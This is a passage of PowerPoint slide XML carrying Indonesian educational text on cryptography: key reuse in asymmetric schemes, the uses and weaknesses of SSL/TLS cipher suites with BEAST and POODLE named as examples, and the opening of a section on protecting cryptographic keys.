            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibobol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Cipher suite, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSL/TLS, juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SSL/TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan server web dan pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web "http" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "https" yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SSL/TLS juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transmisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SMTP, POP, dan IMAP), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panggilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> voice over IP (VoIP) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan transfer file yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (FTP). Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, SSL/TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSL/TLS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> chatting, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonjol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> BEAST (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSL/TLS) dan POODLE (Padding Oracle Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Warisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Diturunkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh SSL dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TLS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekalipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindunginya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
